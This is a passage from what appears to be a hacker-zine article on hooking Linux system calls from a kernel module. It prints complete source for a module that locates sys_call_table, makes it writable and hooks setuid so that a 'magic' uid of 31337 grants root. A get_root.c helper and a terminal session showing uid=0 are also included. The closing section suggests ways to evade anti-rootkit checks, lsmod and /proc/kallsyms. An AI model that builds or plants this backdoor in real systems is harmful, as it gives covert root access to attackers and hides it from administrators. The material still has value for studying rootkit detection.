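static uint64_t demo_pages_spanned(uint64_t addr, uint64_t len)
{
    assert(len > 0);
    return ((demo_page_start(addr + len - 1) - demo_page_start(addr))
            >> DEMO_PAGE_SHIFT) + 1;
}
```

For the ia32_sys_call_table address printed earlier (0xffffffff8154dff8)
the page starts at 0xffffffff8154d000 and the offset is 0xff8, so only the
first 8-byte entry fits in that page and the second one already lies in the
next page. That is exactly the case the 2-page mapping is meant to cover.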
Inside the cleanup function we have to call vunmap() to unmap the pages.

--function: get_writable_sct()--
void *get_writable_sct(void *sct_addr)
{
    struct page *p[2];
    void *sct;
    unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;

    if (sct_addr == NULL)
        return NULL;

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
    p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
    p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
#else
    p[0] = virt_to_page(addr);
    p[1] = virt_to_page(addr + PAGE_SIZE);
#endif
    sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
    if (sct == NULL)
        return NULL;
    return sct + offset_in_page(sct_addr);
}
-- END OF FUNCTION --

-- EXAMPLE --
void **sys_call_table = get_writable_sct(get_sys_call_table());

// hook some system calls

vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
-- END OF EXAMPLE --


--[ 0x0A Hook a system call

To hook a system call, we first store its real address and then replace it
with the address of the function we created. The declarations of the system
call functions are in "include/linux/syscalls.h" [5]. As an example take a
look at the setuid declaration:

    asmlinkage long sys_setuid(uid_t uid);

asmlinkage is a macro which tells gcc that the arguments are passed on the
stack and not in registers, even when optimizing. In our module, we will
define the following:

    asmlinkage long (*real_setuid)(uid_t uid);

real_setuid is a pointer to a function. After that we create our own
function, which calls real_setuid().

    asmlinkage long hooked_setuid(uid_t uid)
    {
        return real_setuid(uid);
    }

If we include asm/unistd_32.h we get the system call numbers for x86-32,
and if we include asm/unistd_64.h we get the numbers for x86-64. In older
glibc versions these files were asm-i386/unistd.h and asm-x86_64/unistd.h.
If we include asm/unistd.h, the preprocessor decides which one to use. In
these files, the system call definitions have the __NR_ prefix.
For example, __NR_setuid gives us setuid's number. To hook setuid we write
the following:

    real_setuid = sys_call_table[__NR_setuid];
    sys_call_table[__NR_setuid] = hooked_setuid;

and to unhook it while cleaning up we do:

    sys_call_table[__NR_setuid] = real_setuid;

If we want the module to work on both x86 architectures, we have to use
preprocessor checks. If CONFIG_IA32_EMULATION is defined, it means that
x86-32 system calls also work on this x86-64 system. For calls like setuid,
sys_call_table and ia32_sys_call_table both contain the same handler
address, but at a different index. There is a small problem: asm/unistd_32.h
and asm/unistd_64.h use the same names for their values, so we can't
include both at the same time. A simple solution is a small script which
detects whether the architecture is x86-64 and, if so, copies
asm/unistd_32.h (or asm-i386/unistd.h) into the folder with our source code
while replacing the prefix __NR_ with __NR32_.

--file: configure.sh--
#!/bin/sh

if [ `uname -m` = x86_64 ]; then
    if [ -e /usr/include/asm/unistd_32.h ]; then
        sed -e 's/__NR_/__NR32_/g' /usr/include/asm/unistd_32.h > unistd_32.h
    else
        if [ -e /usr/include/asm-i386/unistd.h ]; then
            sed -e 's/__NR_/__NR32_/g' /usr/include/asm-i386/unistd.h > unistd_32.h
        else
            echo "asm/unistd_32.h and asm-i386/unistd.h do not exist."
        fi
    fi
fi
--EOF--

In the module we include the generated file like this:

    #ifdef CONFIG_IA32_EMULATION
    #include "unistd_32.h"
    #endif

with this we hook the call:

    #ifdef CONFIG_IA32_EMULATION
        ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
    #endif

and with this we unhook it:

    #ifdef CONFIG_IA32_EMULATION
        ia32_sys_call_table[__NR32_setuid] = real_setuid;
    #endif

Notice:
Sometimes, when the implementation of a system call is changed completely
because the previous one was deprecated, the existing numbers are not
changed but new ones are added. Indeed, after some version on x86-32,
setuid exists 2 times, as sys_setuid16 and sys_setuid.
sys_setuid16 has the number __NR_setuid and sys_setuid has the number
__NR_setuid32. In this case we can hook both if we want, using the
preprocessor to add the extra code. I am not going to implement this, but I
will show the case where we only want to hook sys_setuid.

hook:

    #ifdef __NR_setuid32
        real_setuid = sys_call_table[__NR_setuid32];
        sys_call_table[__NR_setuid32] = hooked_setuid;
    #else
        real_setuid = sys_call_table[__NR_setuid];
        sys_call_table[__NR_setuid] = hooked_setuid;
    #endif
    #ifdef CONFIG_IA32_EMULATION
    #ifdef __NR32_setuid32
        ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
    #else
        ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
    #endif
    #endif

unhook:

    #ifdef __NR_setuid32
        sys_call_table[__NR_setuid32] = real_setuid;
    #else
        sys_call_table[__NR_setuid] = real_setuid;
    #endif
    #ifdef CONFIG_IA32_EMULATION
    #ifdef __NR32_setuid32
        ia32_sys_call_table[__NR32_setuid32] = real_setuid;
    #else
        ia32_sys_call_table[__NR32_setuid] = real_setuid;
    #endif
    #endif

Before I give the whole module's source code, let's make an interesting
modification to hooked_setuid. A nice idea is to change the process uid and
gid to 0 when setuid is called with a "magic" number as its uid parameter.
In other words, to give the process root privileges. The kernel contains
lots of data structures that can change in future versions, either because
vulnerabilities are discovered or because they are reimplemented in a
better way. One of these is 'struct task_struct', where a lot of
information about a process can be found. This struct contains 8
interesting variables:

    uid_t uid, euid, suid, fsuid;
    gid_t gid, egid, sgid, fsgid;

To refer to the running process we use the 'current' macro. For both
(struct task_struct and current) we need to include linux/sched.h.
To give root privileges to a process we do the following:

    current->uid = current->euid = current->suid = current->fsuid = 0;
    current->gid = current->egid = current->sgid = current->fsgid = 0;
    return 0;

This does not work on kernel 2.6.29 and above, because the data structure,
and more generally the method which assigns a new uid and gid to a process,
has changed. The new method uses a new struct, 'struct cred'. To change the
uid and gid we first call prepare_creds(), which returns a pointer to a
newly created 'struct cred' (or NULL on failure), then we change the
variables and call commit_creds(). Finally we return its result.

    struct cred *cred = prepare_creds();
    if (cred == NULL)
        return -ENOMEM;
    cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
    cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
    return commit_creds(cred);

I strongly advise you to use the kernel's git to understand the kernel
changes.
(http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=tags)

--file: hook_setuid.c--
#include <linux/module.h>
#include <linux/version.h>
#include <linux/vmalloc.h>
#include <linux/mm.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#ifdef CONFIG_IA32_EMULATION
#include "unistd_32.h"
#endif

#ifdef __i386__
struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero;
    unsigned char type_flags;
    unsigned short offset_high;
} __attribute__ ((packed));
#elif defined(CONFIG_IA32_EMULATION)
struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero1;
    unsigned char type_flags;
    unsigned short offset_middle;
    unsigned int offset_high;
    unsigned int zero2;
} __attribute__ ((packed));
#endif

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));

void **sys_call_table;
#ifdef CONFIG_IA32_EMULATION
void **ia32_sys_call_table;
#endif

asmlinkage long (*real_setuid)(uid_t uid);

asmlinkage long hooked_setuid(uid_t uid)
{
    if (uid == 31337) {
#if LINUX_VERSION_CODE >= \
    KERNEL_VERSION(2,6,29)
        struct cred *cred = prepare_creds();
        if (cred == NULL)   /* prepare_creds() can fail to allocate */
            return -ENOMEM;
        cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
        cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
        return commit_creds(cred);
#else
        current->uid = current->euid = current->suid = current->fsuid = 0;
        current->gid = current->egid = current->sgid = current->fsgid = 0;
        return 0;
#endif
    }
    return real_setuid(uid);
}

#if defined(__i386__) || defined(CONFIG_IA32_EMULATION)
#ifdef __i386__
void *get_sys_call_table(void)
{
#elif defined(__x86_64__)
void *get_ia32_sys_call_table(void)
{
#endif
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *system_call;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

#ifdef __i386__
    system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);
#elif defined(__x86_64__)
    /* widen every field before shifting so no bits are lost or sign-extended */
    system_call = (void*)(((unsigned long)idtd.offset_high<<32) |
                          ((unsigned long)idtd.offset_middle<<16) |
                          idtd.offset_low);
#endif

    for (ptr=system_call, i=0; i<500; i++) {
#ifdef __i386__
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
#elif defined(__x86_64__)
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
#endif
        ptr++;
    }

    return NULL;
}
#endif

#ifdef __x86_64__
#define IA32_LSTAR  0xc0000082

void *get_sys_call_table(void)
{
    void *system_call;
    unsigned char *ptr;
    unsigned int low, high;   /* unsigned, so "| low" is not sign-extended */
    int i;

    asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));

    system_call = (void*)(((unsigned long)high<<32) | low);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}
#endif

void *get_writable_sct(void *sct_addr)
{
    struct page *p[2];
    void *sct;
    unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;

    if (sct_addr == NULL)
        return NULL;

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
    p[0] =
pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT); p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT); #else p[0] = virt_to_page(addr); p[1] = virt_to_page(addr + PAGE_SIZE); #endif sct = vmap(p, 2, VM_MAP, PAGE_KERNEL); if (sct == NULL) return NULL; return sct + offset_in_page(sct_addr); } static int __init hook_init(void) { sys_call_table = get_writable_sct(get_sys_call_table()); if (sys_call_table == NULL) return -1; #ifdef CONFIG_IA32_EMULATION ia32_sys_call_table = get_writable_sct(get_ia32_sys_call_table()); if (ia32_sys_call_table == NULL) { vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK)); return -1; } #endif /* hook setuid */ #ifdef __NR_setuid32 real_setuid = sys_call_table[__NR_setuid32]; sys_call_table[__NR_setuid32] = hooked_setuid; #else real_setuid = sys_call_table[__NR_setuid]; sys_call_table[__NR_setuid] = hooked_setuid; #endif #ifdef CONFIG_IA32_EMULATION #ifdef __NR32_setuid32 ia32_sys_call_table[__NR32_setuid32] = hooked_setuid; #else ia32_sys_call_table[__NR32_setuid] = hooked_setuid; #endif #endif /***************/ return 0; } static void __exit hook_exit(void) { /* unhook setuid */ #ifdef __NR_setuid32 sys_call_table[__NR_setuid32] = real_setuid; #else sys_call_table[__NR_setuid] = real_setuid; #endif #ifdef CONFIG_IA32_EMULATION #ifdef __NR32_setuid32 ia32_sys_call_table[__NR32_setuid32] = real_setuid; #else ia32_sys_call_table[__NR32_setuid] = real_setuid; #endif #endif /*****************/ // unmap memory vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK)); #ifdef CONFIG_IA32_EMULATION vunmap((void*)((unsigned long)ia32_sys_call_table & PAGE_MASK)); #endif } module_init(hook_init); module_exit(hook_exit); MODULE_LICENSE("GPL"); --EOF-- --file: get_root.c-- #include <unistd.h> int main() { if (setuid(31337) == -1) { perror("setuid"); return 1; } execlp("bash", "bash", NULL); } --EOF-- oblique@gentoo ~/hooking $ ./configure.sh oblique@gentoo ~/hooking $ make make -C /lib/modules/2.6.34-zen1/build 
M=/home/oblique/hooking modules make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2' CC [M] /home/oblique/hooking/hook_setuid.o Building modules, stage 2. MODPOST 1 modules CC /home/oblique/hooking/hook_setuid.mod.o LD [M] /home/oblique/hooking/hook_setuid.ko make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2' oblique@gentoo ~/hooking $ sudo insmod hook_setuid.ko oblique@gentoo ~/hooking $ gcc get_root.c -o get_root oblique@gentoo ~/hooking $ ./get_root gentoo hooking # id uid=0(root) gid=0(root) groups=0(root) gentoo hooking # rmmod hook_setuid gentoo hooking # exit exit oblique@gentoo ~/hooking $ ./get_root setuid: Operation not permitted oblique@gentoo ~/hooking $ --[ 0x0B Other ideas/methods What we saw, was one of the most basic hooking techniques. There are lots of equivalent techniques: for example, to avoid editing the sys_call_table, we can just allocate a buffer in kernel memory and copy the sys_call_table there. Then we change the addresses in the new array and finally we change the address called by the system_call. If we want, we can change the intrerrupt's 0x80 value from IDT, or the value of IA32_LSTAR MSR, pointing to another system_call. One other elegant hooking method, independent from system calls, is hooking the debugger's trap. This can be implemented using the interrupt 3 from IDT. This technique has some limitations. It cannot be applied in systems which have the LKM support disabled. Modules *must* be compiled for the same kernel they are going to be loaded from, which means that with a kernel update, module needs to be re-compiled. Solutions for these issues are provided by some userland-based techniques which can change the kernel memory through /dev/mem or /dev/kmem, but in this case other forms of protection need to be faced. Notice: Anti-rootkits usually check the sys_call_table, so the method shown here should not be used. 
A possible workaround is to change the address of sys_call_table inside
system_call, or to implement our own system_call. Moreover, with lsmod or
through /proc/kallsyms a sysadmin should be able to notice that something is
wrong... but hooking can solve these issues as well.

I hope you enjoyed reading the article as much as I enjoyed writing it :)

Happy hacking,
oblique.


--[ 0x0C Greets

Greets to grhack.net community, AthCon staff and p0wnbox.Team.
Special thanks to slasher, huku, sin, Hack_ThE_PaRaDiSe, krumel, smack for
their knowledge and their company.
Thanks pytt, angel_scar and killer_null for being good friends.
Last but not least I want to give kudos to my friends from the real world,
psychedelic music and FF.C for their songs and philosophy.


--[ 0x0D References

[1] http://phrack.org/issues.html?issue=59&id=4#article
[2] http://phrack.org/issues.html?issue=58&id=7#article
[3] http://wiki.osdev.org/IDT#IDT_in_IA-32e_Mode_.2864-bit_IDT.29
[5] Linux Kernel source code (http://kernel.org)
[6] KSplice source code (http://www.ksplice.com/software)

Intel 64 and IA-32 Architectures Software Developer's Manual
(http://www.intel.com/products/processor/manuals/):
[7] "Volume 3A: System Programming Guide", Sections: 5.8.7 - 5.9, 9.4
[8] "Volume 3B: System Programming Guide", Appendix B
[9] "Volume 2B: Instruction Set Reference, N-Z", Section: 4.2,
    Instructions: RDMSR, WRMSR, SYSCALL

_______________________________|_._._._._._, \ EOF |_X_X_X_X_X_| !